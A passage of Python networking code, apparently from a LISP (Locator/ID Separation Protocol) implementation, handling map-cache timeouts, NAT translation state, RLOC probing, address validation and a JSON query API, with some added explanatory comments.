    eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)

    #
    # Send some IPv4 Map-Requests.
    #
    eid.store_address("10.0.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid, None)
    eid.store_address("192.168.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid, None)

    #
    # Send some IPv6 Map-Requests.
    #
    eid6.store_address("0100::1")
    lisp_send_map_request(lisp_sockets, port, None, eid6, None)
    eid6.store_address("8000::1")
    lisp_send_map_request(lisp_sockets, port, None, eid6, None)

    #
    # Restart the test timer.
    #
    timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
        [lisp_sockets, port])
    timer.start()
    return
def lisp_update_local_rloc(rloc):

    #
    # If the RLOC is tied to an interface, check whether the interface
    # address changed (for example, via DHCP) and update the RLOC if so.
    #
    if (rloc.interface == None): return

    address = lisp_get_interface_address(rloc.interface)
    if (address == None): return

    old_addr = rloc.rloc.print_address_no_iid()
    new_addr = address.print_address_no_iid()

    if (old_addr == new_addr): return

    lprint("Local interface address changed on {} from {} to {}".format(
        rloc.interface, old_addr, new_addr))

    rloc.rloc.copy_address(address)
    lisp_myrlocs[0] = address
    return
def lisp_update_encap_port(mc):

    #
    # For each RLOC in the map-cache entry, check the NAT state table
    # for a newer translated encapsulation port and store it if changed.
    #
    for rloc in mc.rloc_set:
        nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
        if (nat_info == None): continue
        if (rloc.translated_port == nat_info.port): continue

        lprint(("Encap-port changed from {} to {} for RLOC {}, " +
            "EID-prefix {}").format(rloc.translated_port, nat_info.port,
            red(rloc.rloc.print_address_no_iid(), False),
            green(mc.print_eid_tuple(), False)))

        rloc.store_translated_rloc(rloc.rloc, nat_info.port)
    return
def lisp_timeout_map_cache_entry(mc, delete_list):

    #
    # Entries with no TTL never expire, but their encap-ports may change.
    #
    if (mc.map_cache_ttl == None):
        lisp_update_encap_port(mc)
        return([True, delete_list])

    now = lisp_get_timestamp()

    #
    # Not expired yet. While here, update the encap-port in case the RLOC
    # is behind a NAT and the translation changed.
    #
    if (mc.last_refresh_time + mc.map_cache_ttl > now):
        if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
        return([True, delete_list])

    #
    # Don't time out the NAT-traversal default entry (0.0.0.0/0).
    #
    if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
        return([True, delete_list])

    #
    # Expired. Queue the entry for deletion after the walk completes,
    # since deleting mid-walk would corrupt the iteration.
    #
    elapsed = lisp_print_elapsed(mc.last_refresh_time)
    eid_str = mc.print_eid_tuple()
    lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}".\
        format(green(eid_str, False), bold("timed out", False), elapsed))

    delete_list.append(mc)
    return([True, delete_list])
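#
# For reference: walker functions passed to walk_cache() receive
# (entry, parms) and return [continue-flag, parms]; walk_cache() threads
# parms through every entry and returns it. A minimal illustration with a
# hypothetical walker (not part of the original code):
#
#   def count_entries(mc, total):
#       return([True, total + 1])       # True means keep walking
#
#   total = lisp_map_cache.walk_cache(count_entries, 0)
#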
def lisp_timeout_map_cache_walk(mc, parms):
    delete_list = parms[0]
    checkpoint_list = parms[1]

    #
    # Unicast entries are timed out directly; entries that survive are
    # written to the checkpoint list.
    #
    if (mc.group.is_null()):
        status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
        if (delete_list == [] or mc != delete_list[-1]):
            checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list,
                mc)
        return([status, parms])

    if (mc.source_cache == None): return([True, parms])

    #
    # For (S,G) entries, walk the per-group source cache.
    #
    parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
    return([True, parms])
def lisp_timeout_map_cache(lisp_map_cache):
    parms = [[], []]
    parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)

    #
    # Now delete the timed-out entries collected during the walk.
    #
    delete_list = parms[0]
    for mc in delete_list: mc.delete_cache()

    #
    # Write the surviving entries to the checkpoint file.
    #
    checkpoint_list = parms[1]
    lisp_checkpoint(checkpoint_list)
    return
def lisp_store_nat_info(hostname, rloc, port):

    #
    # Store NAT translation state for an ETR, keyed by hostname. The
    # most recently used entry is kept at the head of the list. Returns
    # True if the caller needs to act on a new or changed translation.
    #
    addr_str = rloc.print_address_no_iid()
    msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
        blue(hostname, False), red(addr_str, False), port)

    new_nat_info = lisp_nat_info(addr_str, hostname, port)

    if (hostname not in lisp_nat_state_info):
        lisp_nat_state_info[hostname] = [new_nat_info]
        lprint(msg.format("Store initial"))
        return(True)

    #
    # If this address/port pair is already at the head of the list, just
    # refresh the entry's uptime.
    #
    nat_info = lisp_nat_state_info[hostname][0]
    if (nat_info.address == addr_str and nat_info.port == port):
        nat_info.uptime = lisp_get_timestamp()
        lprint(msg.format("Refresh existing"))
        return(False)

    #
    # Otherwise, look for the pair deeper in the list so it can be moved
    # to the head.
    #
    found = None
    for nat_info in lisp_nat_state_info[hostname]:
        if (nat_info.address == addr_str and nat_info.port == port):
            found = nat_info
            break

    if (found == None):
        lprint(msg.format("Store new"))
    else:
        lisp_nat_state_info[hostname].remove(found)
        lprint(msg.format("Use previous"))

    remaining = lisp_nat_state_info[hostname]
    lisp_nat_state_info[hostname] = [new_nat_info] + remaining
    return(True)
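#
# For reference, the NAT state table managed above has this shape
# (illustrative values, not from a real deployment):
#
#   lisp_nat_state_info = {
#       "etr-hostname": [<lisp_nat_info>, <lisp_nat_info>, ...]
#   }
#
# Each list is kept most-recently-used first, and each lisp_nat_info
# carries .address (translated RLOC string), .port (translated port),
# and .uptime (refreshed on each Info-Request).
#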
def lisp_get_nat_info(rloc, hostname):

    #
    # Return the NAT state entry for this hostname and RLOC address, or
    # None if we have no state for it.
    #
    if (hostname not in lisp_nat_state_info): return(None)

    addr_str = rloc.print_address_no_iid()
    for nat_info in lisp_nat_state_info[hostname]:
        if (nat_info.address == addr_str): return(nat_info)
    return(None)
def lisp_build_info_requests(lisp_sockets, dest, port):
    if (lisp_nat_traversal == False): return

    #
    # When no destination is supplied, send Info-Requests to the
    # configured Map-Resolvers, falling back to Map-Servers if no
    # Map-Resolvers exist.
    #
    dest_list = []
    mr_list = []
    if (dest == None):
        for mr in list(lisp_map_resolvers_list.values()):
            mr_list.append(mr.map_resolver)
        dest_list = mr_list
        if (dest_list == []):
            for ms in list(lisp_map_servers_list.values()):
                dest_list.append(ms.map_server)
        if (dest_list == []): return
    else:
        dest_list.append(dest)

    #
    # Collect the local interface RLOCs from the database-mappings,
    # refreshing each local address first.
    #
    rloc_list = {}
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            lisp_update_local_rloc(rloc_entry)
            if (rloc_entry.rloc.is_null()): continue
            if (rloc_entry.interface == None): continue

            addr_str = rloc_entry.rloc.print_address_no_iid()
            if (addr_str in rloc_list): continue
            rloc_list[addr_str] = rloc_entry.interface

    if (rloc_list == {}):
        lprint('Suppress Info-Request, no "interface = <device>" RLOC ' +
            "found in any database-mappings")
        return

    #
    # Send an Info-Request out each interface listed. The device is only
    # passed when more than one interface is involved.
    #
    for addr_str in rloc_list:
        interface = rloc_list[addr_str]
        a = red(addr_str, False)
        lprint("Build Info-Request for private address {} ({})".format(a,
            interface))
        device = interface if len(rloc_list) > 1 else None
        for dest in dest_list:
            lisp_send_info_request(lisp_sockets, dest, port, device)

    #
    # Refresh Map-Resolver DNS names if they were used.
    #
    if (mr_list != []):
        for mr in list(lisp_map_resolvers_list.values()):
            mr.resolve_dns_name()

    return
def lisp_valid_address_format(kw, value):
    if (kw != "address"): return(True)

    #
    # A distinguished-name address is single-quoted.
    #
    if (value[0] == "'" and value[-1] == "'"): return(True)

    #
    # Check for an IPv4 dotted-quad: four fields, each a decimal
    # value no greater than 255.
    #
    if (value.find(".") != -1):
        addr = value.split(".")
        if (len(addr) != 4): return(False)

        for byte in addr:
            if (byte.isdigit() == False): return(False)
            if (int(byte) > 255): return(False)
        return(True)

    #
    # Check for a geo-prefix: dash-separated with an N/S and W/E
    # designator and at least 8 fields.
    #
    if (value.find("-") != -1):
        addr = value.split("-")
        for letter in ["N", "S", "W", "E"]:
            if (letter in addr):
                if (len(addr) < 8): return(False)
                return(True)

    #
    # Check for a MAC address of the form xxxx-xxxx-xxxx, all hex.
    #
    if (value.find("-") != -1):
        addr = value.split("-")
        if (len(addr) != 3): return(False)

        for field in addr:
            try: int(field, 16)
            except: return(False)
        return(True)

    #
    # Check for an IPv6 address: colon-separated hex fields with at most
    # one "::" run.
    #
    if (value.find(":") != -1):
        addr = value.split(":")
        if (len(addr) < 2): return(False)

        found_null = False
        count = 0
        for field in addr:
            count += 1
            if (field == ""):
                if (found_null):
                    if (len(addr) == count): break
                    if (count > 2): return(False)
                found_null = True
                continue
            try: int(field, 16)
            except: return(False)
        return(True)

    #
    # Check for an E.164 telephone number: "+" followed by digits.
    #
    if (value[0] == "+"):
        addr = value[1::]
        for digit in addr:
            if (digit.isdigit() == False): return(False)
        return(True)
    return(False)
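#
# For reference, illustrative inputs accepted by
# lisp_valid_address_format(), one per address family checked above
# (hypothetical values):
#
#   lisp_valid_address_format("address", "'xtr-name'")              # name
#   lisp_valid_address_format("address", "10.1.2.3")                # IPv4
#   lisp_valid_address_format("address", "45-30-10-N-100-20-30-W")  # geo
#   lisp_valid_address_format("address", "0050-56c0-0008")          # MAC
#   lisp_valid_address_format("address", "fd00::1")                 # IPv6
#   lisp_valid_address_format("address", "+14085551212")            # E.164
#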
def lisp_process_api(process, lisp_socket, data_structure):
    api_name, parms = data_structure.split("%")

    lprint("Process API request '{}', parameters: '{}'".format(api_name,
        parms))

    data = []
    if (api_name == "map-cache"):
        if (parms == ""):
            data = lisp_map_cache.walk_cache(lisp_process_api_map_cache,
                data)
        else:
            data = lisp_process_api_map_cache_entry(json.loads(parms))

    if (api_name == "site-cache"):
        if (parms == ""):
            data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
                data)
        else:
            data = lisp_process_api_site_cache_entry(json.loads(parms))

    if (api_name == "site-cache-summary"):
        data = lisp_process_api_site_cache_summary(lisp_sites_by_eid)

    if (api_name == "map-server"):
        parms = {} if (parms == "") else json.loads(parms)
        data = lisp_process_api_ms_or_mr(True, parms)

    if (api_name == "map-resolver"):
        parms = {} if (parms == "") else json.loads(parms)
        data = lisp_process_api_ms_or_mr(False, parms)

    if (api_name == "database-mapping"):
        data = lisp_process_api_database_mapping()

    #
    # Return the JSON-encoded result to the lisp-core process.
    #
    data = json.dumps(data)
    ipc = lisp_api_ipc(process, data)
    lisp_ipc(ipc, lisp_socket, "lisp-core")
    return
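#
# For reference, data_structure above is "<api-name>%<json-parms>".
# Illustrative requests (hypothetical values):
#
#   "map-cache%"                                    # walk the whole cache
#   "map-cache%" + json.dumps({"instance-id": "0",
#                              "eid-prefix": "10.0.0.0/8"})
#   "map-server%" + json.dumps({"dns-name": "ms.example.com"})
#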
def lisp_process_api_map_cache(mc, data):

    #
    # Unicast entries are gathered directly; for (S,G) entries, walk the
    # per-group source cache.
    #
    if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))

    if (mc.source_cache == None): return([True, data])

    data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
    return([True, data])
def lisp_gather_map_cache_data(mc, data):
    entry = {}
    entry["instance-id"] = str(mc.eid.instance_id)
    entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
    if (mc.group.is_null() == False):
        entry["group-prefix"] = mc.group.print_prefix_no_iid()

    entry["uptime"] = lisp_print_elapsed(mc.uptime)
    entry["expires"] = lisp_print_elapsed(mc.uptime)
    entry["action"] = lisp_map_reply_action_string[mc.action]
    entry["ttl"] = "--" if mc.map_cache_ttl == None else \
        str(mc.map_cache_ttl / 60)

    #
    # Encode the RLOC-set, checking for multicast RLOC entries.
    #
    rloc_set = []
    for rloc in mc.rloc_set:
        r = lisp_fill_rloc_in_json(rloc)

        #
        # Fill in the multicast RLOC-probe state if it exists.
        #
        if (rloc.rloc.is_multicast_address()):
            r["multicast-rloc-set"] = []
            for mrloc in list(rloc.multicast_rloc_probe_list.values()):
                mr = lisp_fill_rloc_in_json(mrloc)
                r["multicast-rloc-set"].append(mr)

        rloc_set.append(r)

    entry["rloc-set"] = rloc_set

    data.append(entry)
    return([True, data])
def lisp_fill_rloc_in_json(rloc):
    r = {}
    if (rloc.rloc_exists()):
        r["address"] = rloc.rloc.print_address_no_iid()

    if (rloc.translated_port != 0):
        r["encap-port"] = str(rloc.translated_port)

    r["state"] = rloc.print_state()
    if (rloc.geo): r["geo"] = rloc.geo.print_geo()
    if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
    if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
    if (rloc.json): r["json"] = rloc.json.print_json(False)
    if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
    stats = rloc.stats.get_stats(False, False)
    if (stats): r["stats"] = stats
    r["uptime"] = lisp_print_elapsed(rloc.uptime)
    r["upriority"] = str(rloc.priority)
    r["uweight"] = str(rloc.weight)
    r["mpriority"] = str(rloc.mpriority)
    r["mweight"] = str(rloc.mweight)
    reply_time = rloc.last_rloc_probe_reply
    if (reply_time):
        r["last-rloc-probe-reply"] = lisp_print_elapsed(reply_time)
        r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)

    r["rloc-hop-count"] = rloc.rloc_probe_hops
    r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops

    r["rloc-probe-latency"] = rloc.rloc_probe_latency
    r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies

    rtts = []
    for rtt in rloc.recent_rloc_probe_rtts: rtts.append(str(rtt))
    r["recent-rloc-probe-rtts"] = rtts
    return(r)
def lisp_process_api_map_cache_entry(parms):
    iid = parms["instance-id"]
    iid = 0 if (iid == "") else int(iid)

    #
    # Parse the EID from the API request.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])
    dest = eid
    source = eid

    #
    # Parse the group, if present, for an (S,G) lookup.
    #
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if ("group-prefix" in parms):
        group.store_prefix(parms["group-prefix"])
        dest = group

    data = []
    mc = lisp_map_cache_lookup(source, dest)
    if (mc): status, data = lisp_process_api_map_cache(mc, data)
    return(data)
def lisp_process_api_site_cache_summary(site_cache):
    site_template = {"site": "", "registrations": []}
    entry_template = {"eid-prefix": "", "count": 0, "registered-count": 0}

    #
    # Summarize, per site, each accept-more-specifics EID-prefix with a
    # count of its more-specific registrations.
    #
    sites = {}
    for key in site_cache.cache_sorted:
        for site_eid in list(site_cache.cache[key].entries.values()):
            if (site_eid.accept_more_specifics == False): continue
            if (site_eid.site.site_name not in sites):
                sites[site_eid.site.site_name] = []

            entry = copy.deepcopy(entry_template)
            entry["eid-prefix"] = site_eid.eid.print_prefix()
            entry["count"] = len(site_eid.more_specific_registrations)
            for ms in site_eid.more_specific_registrations:
                if (ms.registered): entry["registered-count"] += 1

            sites[site_eid.site.site_name].append(entry)

    data = []
    for site_name in sites:
        site = copy.deepcopy(site_template)
        site["site"] = site_name
        site["registrations"] = sites[site_name]
        data.append(site)

    return(data)
def lisp_process_api_site_cache(se, data):

    #
    # Unicast entries are gathered directly; for (S,G) entries, walk the
    # per-group source cache.
    #
    if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))

    if (se.source_cache == None): return([True, data])

    data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
    return([True, data])
def lisp_process_api_ms_or_mr(ms_or_mr, data):
    address = lisp_address(LISP_AFI_NONE, "", 0, 0)
    dns_name = data["dns-name"] if ("dns-name" in data) else None
    if ("address" in data):
        address.store_address(data["address"])

    entry = {}
    if (ms_or_mr):
        for ms in list(lisp_map_servers_list.values()):
            if (dns_name):
                if (dns_name != ms.dns_name): continue
            else:
                if (address.is_exact_match(ms.map_server) == False):
                    continue

            entry["dns-name"] = ms.dns_name
            entry["address"] = ms.map_server.print_address_no_iid()
            entry["ms-name"] = "" if ms.ms_name == None else ms.ms_name
            return([entry])
    else:
        for mr in list(lisp_map_resolvers_list.values()):
            if (dns_name):
                if (dns_name != mr.dns_name): continue
            else:
                if (address.is_exact_match(mr.map_resolver) == False):
                    continue

            entry["dns-name"] = mr.dns_name
            entry["address"] = mr.map_resolver.print_address_no_iid()
            entry["mr-name"] = "" if mr.mr_name == None else mr.mr_name
            return([entry])

    return([])
def lisp_process_api_database_mapping():
    data = []

    for db in lisp_db_list:
        entry = {}
        entry["eid-prefix"] = db.eid.print_prefix()
        if (db.group.is_null() == False):
            entry["group-prefix"] = db.group.print_prefix()

        rlocs = []
        for rloc_entry in db.rloc_set:
            r = {}
            if (rloc_entry.rloc.is_null() == False):
                r["rloc"] = rloc_entry.rloc.print_address_no_iid()
            if (rloc_entry.rloc_name != None):
                r["rloc-name"] = rloc_entry.rloc_name
            if (rloc_entry.interface != None):
                r["interface"] = rloc_entry.interface
            translated = rloc_entry.translated_rloc
            if (translated.is_null() == False):
                r["translated-rloc"] = translated.print_address_no_iid()

            if (r != {}): rlocs.append(r)

        #
        # Add the RLOC-set array to the entry.
        #
        entry["rlocs"] = rlocs

        #
        # Add the EID entry to the returned array.
        #
        data.append(entry)

    return(data)
def lisp_gather_site_cache_data(se, data):
    entry = {}
    entry["site-name"] = se.site.site_name
    entry["instance-id"] = str(se.eid.instance_id)
    entry["eid-prefix"] = se.eid.print_prefix_no_iid()
    if (se.group.is_null() == False):
        entry["group-prefix"] = se.group.print_prefix_no_iid()

    entry["registered"] = "yes" if se.registered else "no"
    entry["first-registered"] = lisp_print_elapsed(se.first_registered)
    entry["last-registered"] = lisp_print_elapsed(se.last_registered)

    addr = se.last_registerer
    addr = "none" if addr.is_null() else addr.print_address()
    entry["last-registerer"] = addr
    entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
    entry["dynamic"] = "yes" if (se.dynamic) else "no"
    entry["site-id"] = str(se.site_id)
    if (se.xtr_id_present):
        entry["xtr-id"] = "0x" + lisp_hex_string(se.xtr_id)

    #
    # Gather the registered RLOC-set.
    #
    rloc_set = []
    for rloc in se.registered_rlocs:
        r = {}
        r["address"] = rloc.rloc.print_address_no_iid() if \
            rloc.rloc_exists() else "none"

        if (rloc.geo): r["geo"] = rloc.geo.print_geo()
        if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
        if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
        if (rloc.json): r["json"] = rloc.json.print_json(False)
        if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
        r["uptime"] = lisp_print_elapsed(rloc.uptime)
        r["upriority"] = str(rloc.priority)
        r["uweight"] = str(rloc.weight)
        r["mpriority"] = str(rloc.mpriority)
        r["mweight"] = str(rloc.mweight)

        rloc_set.append(r)

    entry["registered-rlocs"] = rloc_set

    data.append(entry)
    return([True, data])
def lisp_process_api_site_cache_entry(parms):
    iid = parms["instance-id"]
    iid = 0 if (iid == "") else int(iid)

    #
    # Parse the EID from the API request.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])

    #
    # Parse the group, if present, for an (S,G) lookup.
    #
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if ("group-prefix" in parms):
        group.store_prefix(parms["group-prefix"])

    data = []
    site_eid = lisp_site_eid_lookup(eid, group, False)
    if (site_eid): lisp_gather_site_cache_data(site_eid, data)
    return(data)
def lisp_get_interface_instance_id(device, source_eid):
    interface = None
    if (device in lisp_myinterfaces):
        interface = lisp_myinterfaces[device]

    #
    # If the interface is not found, or has no instance-id configured,
    # return the default instance-id.
    #
    if (interface == None or interface.instance_id == None):
        return(lisp_default_iid)

    #
    # For multi-tenant interfaces on this device, find the longest
    # matching multi-tenant EID-prefix the source EID falls inside.
    # Otherwise, return the instance-id of the interface.
    #
    iid = interface.get_instance_id()
    if (source_eid == None): return(iid)

    save_iid = source_eid.instance_id
    best = None
    for interface in lisp_multi_tenant_interfaces:
        if (interface.device != device): continue
        prefix = interface.multi_tenant_eid
        source_eid.instance_id = prefix.instance_id
        if (source_eid.is_more_specific(prefix) == False): continue
        if (best == None or best.multi_tenant_eid.mask_len <
            prefix.mask_len):
            best = interface

    source_eid.instance_id = save_iid

    if (best == None): return(iid)
    return(best.get_instance_id())
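
# Example (hypothetical config): if device "eth0" carries two multi-tenant
# EID-prefixes, 10.0.0.0/8 with instance-id 1000 and 10.1.0.0/16 with
# instance-id 2000, a source EID of 10.1.1.1 matches both and the longest
# mask wins, so lisp_get_interface_instance_id("eth0", source_eid)
# returns 2000.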
def lisp_allow_dynamic_eid(device, eid):
    if (device not in lisp_myinterfaces): return(None)

    interface = lisp_myinterfaces[device]
    return_device = device if interface.dynamic_eid_device == None else \
        interface.dynamic_eid_device

    if (interface.does_dynamic_eid_match(eid)): return(return_device)
    return(None)
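
# Example (hypothetical config): with a dynamic-EID prefix configured on
# "eth2", lisp_allow_dynamic_eid("eth2", eid) returns the device to use for
# the dynamic-EID ("eth2" itself, or the configured dynamic-eid-device)
# when the EID matches, and None otherwise.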
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
    global lisp_rloc_probe_timer

    if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()

    func = lisp_process_rloc_probe_timer
    timer = threading.Timer(interval, func, [lisp_sockets])
    lisp_rloc_probe_timer = timer
    timer.start()
    return
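
# Note on the rearm pattern: lisp_process_rloc_probe_timer() below calls
# lisp_start_rloc_probe_timer() again as its first action, so probing
# repeats every `interval` seconds; cancelling any outstanding
# threading.Timer first keeps at most one timer pending.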
def lisp_show_rloc_probe_list():
    lprint(bold("----- RLOC-probe-list -----", False))
    for key in lisp_rloc_probe_list:
        rloc_list = lisp_rloc_probe_list[key]
        lprint("RLOC {}:".format(key))
        for rloc, eid, group in rloc_list:
            lprint("  [{}, {}, {}, {}]".format(hex(id(rloc)),
                eid.print_prefix(), group.print_prefix(),
                rloc.translated_port))

    lprint(bold("---------------------------", False))
    return
def lisp_mark_rlocs_for_other_eids(eid_list):

    #
    # The first (RLOC, EID, group) tuple was already handled by the
    # caller; mark the RLOC unreachable for the remaining EIDs that
    # share it, and log each one.
    #
    rloc, eid, group = eid_list[0]
    eids = [lisp_print_eid_tuple(eid, group)]

    for rloc, eid, group in eid_list[1::]:
        rloc.state = LISP_RLOC_UNREACH_STATE
        rloc.last_state_change = lisp_get_timestamp()
        eids.append(lisp_print_eid_tuple(eid, group))

    unreach = bold("unreachable", False)
    rloc_str = red(rloc.rloc.print_address_no_iid(), False)

    for eid_str in eids:
        e = green(eid_str, False)
        lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))

    #
    # Tell the external data-plane about each map-cache entry whose RLOC
    # state just changed.
    #
    for rloc, eid, group in eid_list:
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc): lisp_write_ipc_map_cache(True, mc)

    return
def lisp_process_rloc_probe_timer(lisp_sockets):
    lisp_set_exception()

    lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
    if (lisp_rloc_probing == False): return

    #
    # Debug aid, prints the RLOC-probe list when enabled.
    #
    if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()

    #
    # Get next-hops of the default route so RLOCs that use a specific
    # next-hop can be checked against them.
    #
    default_next_hops = lisp_get_default_route_next_hops()

    lprint("---------- Start RLOC Probing for {} entries ----------".format(
        len(lisp_rloc_probe_list)))

    #
    # Walk each unique RLOC in the probe list.
    #
    count = 0
    probe = bold("RLOC-probe", False)
    for values in list(lisp_rloc_probe_list.values()):

        #
        # Send only one probe per RLOC even when the RLOC is used by
        # multiple EID-prefixes.
        #
        last_rloc = None
        for parent_rloc, eid, group in values:
            addr_str = parent_rloc.rloc.print_address_no_iid()

            #
            # Do not probe gleaned map-cache entries unless configured.
            #
            glean, glean_probe, x = lisp_allow_gleaning(eid, None,
                parent_rloc)
            if (glean and glean_probe == False):
                e = green(eid.print_address(), False)
                addr_str += ":{}".format(parent_rloc.translated_port)
                lprint("Suppress probe to RLOC {} for gleaned EID {}".\
                    format(red(addr_str, False), e))
                continue

            #
            # Do not probe RLOCs that are admin-down.
            #
            if (parent_rloc.down_state()): continue

            #
            # If this RLOC address was already probed on this pass, copy
            # the probe state so one reply updates all users of the RLOC.
            #
            if (last_rloc):
                parent_rloc.last_rloc_probe_nonce = \
                    last_rloc.last_rloc_probe_nonce

                if (last_rloc.translated_port ==
                    parent_rloc.translated_port and
                    last_rloc.rloc_name == parent_rloc.rloc_name):
                    e = green(lisp_print_eid_tuple(eid, group), False)
                    lprint("Suppress probe to duplicate RLOC {} for {}".\
                        format(red(addr_str, False), e))

                    parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
                    continue

            nh = None
            rloc = None
            while (True):
                rloc = parent_rloc if rloc == None else rloc.next_rloc
                if (rloc == None): break

                #
                # When multiple egress interfaces are in use, declare the
                # RLOC unreachable if its next-hop is no longer one of
                # the default-route next-hops.
                #
                if (rloc.rloc_next_hop != None):
                    if (rloc.rloc_next_hop not in default_next_hops):
                        if (rloc.up_state()):
                            device, nh_addr = rloc.rloc_next_hop
                            rloc.state = LISP_RLOC_UNREACH_STATE
                            rloc.last_state_change = lisp_get_timestamp()
                            lisp_update_rtr_updown(rloc.rloc, False)

                            unreach = bold("unreachable", False)
                            lprint("Next-hop {}({}) for RLOC {} is {}".\
                                format(nh_addr, device, red(addr_str,
                                False), unreach))
                        continue

                #
                # Don't probe again while still waiting for a reply.
                #
                last = rloc.last_rloc_probe
                delta = 0 if last == None else time.time() - last
                if (rloc.unreach_state() and delta <
                    LISP_RLOC_PROBE_INTERVAL):
                    lprint("Waiting for probe-reply from RLOC {}".format(
                        red(addr_str, False)))
                    continue

                #
                # If a request-nonce timed out without being echoed, the
                # RLOC goes unreachable.
                #
                echo_nonce = lisp_get_echo_nonce(None, addr_str)
                if (echo_nonce and echo_nonce.request_nonce_timeout()):
                    rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
                    rloc.last_state_change = lisp_get_timestamp()
                    unreach = bold("unreachable", False)
                    lprint("RLOC {} went {}, nonce-echo failed".format(
                        red(addr_str, False), unreach))

                    lisp_update_rtr_updown(rloc.rloc, False)
                    continue

                #
                # Suppress the probe if a nonce-echo was received
                # recently; the RLOC is provably reachable.
                #
                if (echo_nonce and echo_nonce.recently_echoed()):
                    lprint(("Suppress RLOC-probe to {}, nonce-echo " +
                        "received").format(red(addr_str, False)))
                    continue

                #
                # Mark the RLOC unreachable if no probe-reply arrived
                # within the reply-wait window, and propagate the state
                # to the other EIDs that use this RLOC.
                #
                if (rloc.last_rloc_probe != None):
                    last = rloc.last_rloc_probe_reply
                    if (last == None): last = 0
                    delta = time.time() - last
                    if (rloc.up_state() and delta >=
                        LISP_RLOC_PROBE_REPLY_WAIT):
                        rloc.state = LISP_RLOC_UNREACH_STATE
                        rloc.last_state_change = lisp_get_timestamp()
                        lisp_update_rtr_updown(rloc.rloc, False)
                        unreach = bold("unreachable", False)
                        lprint("RLOC {} went {}, probe it".format(
                            red(addr_str, False), unreach))

                        lisp_mark_rlocs_for_other_eids(values)

                rloc.last_rloc_probe = lisp_get_timestamp()

                reach = "" if rloc.unreach_state() == False else \
                    " unreachable"

                #
                # Install a host route so the probe egresses the
                # interface this RLOC entry is associated with.
                #
                nh_str = ""
                nh_addr = None
                if (rloc.rloc_next_hop != None):
                    device, nh_addr = rloc.rloc_next_hop
                    lisp_install_host_route(addr_str, nh_addr, True)
                    nh_str = ", send on nh {}({})".format(nh_addr, device)

                #
                # Log the probe with the RTT from the last exchange.
                #
                rtt = rloc.print_rloc_probe_rtt()
                str_rloc = addr_str
                if (rloc.translated_port != 0):
                    str_rloc += ":{}".format(rloc.translated_port)

                str_rloc = red(str_rloc, False)
                if (rloc.rloc_name != None):
                    str_rloc += " (" + blue(rloc.rloc_name, False) + ")"

                lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
                    str_rloc, rtt, nh_str))

                #
                # Save any host route already installed for this RLOC so
                # it can be put back after the probe is sent.
                #
                if (rloc.rloc_next_hop != None):
                    nh = lisp_get_host_route_next_hop(addr_str)
                    if (nh): lisp_install_host_route(addr_str, nh, False)

                #
                # An RLOC behind a NAT may have a null address; copy it
                # from the parent RLOC.
                #
                if (rloc.rloc.is_null()):
                    rloc.rloc.copy_address(parent_rloc.rloc)

                #
                # Send the RLOC-probe Map-Request.
                #
                seid = None if (group.is_null()) else eid
                deid = eid if (group.is_null()) else group
                lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
                last_rloc = parent_rloc

                #
                # Remove the temporary host route used for the probe.
                #
                if (nh_addr): lisp_install_host_route(addr_str, nh_addr,
                    False)

            #
            # Reinstall the host route that was in place before probing.
            #
            if (nh): lisp_install_host_route(addr_str, nh, True)

            #
            # Pace probes: get off the CPU briefly every 10 sends.
            #
            count += 1
            if ((count % 10) == 0): time.sleep(0.020)

    lprint("---------- End RLOC Probing ----------")
    return
def lisp_update_rtr_updown(rtr, updown):
    global lisp_ipc_socket

    #
    # Only the lisp-itr process sends this IPC message.
    #
    if (lisp_i_am_itr == False): return

    #
    # If all RTRs are registered regardless of reachability, no IPC
    # message is needed.
    #
    if (lisp_register_all_rtrs): return

    rtr_str = rtr.print_address_no_iid()

    #
    # Ignore RTRs we have not learned about.
    #
    if (rtr_str not in lisp_rtr_list): return

    updown = "up" if updown else "down"
    lprint("Send ETR IPC message, RTR {} has gone {}".format(
        red(rtr_str, False), bold(updown, False)))

    #
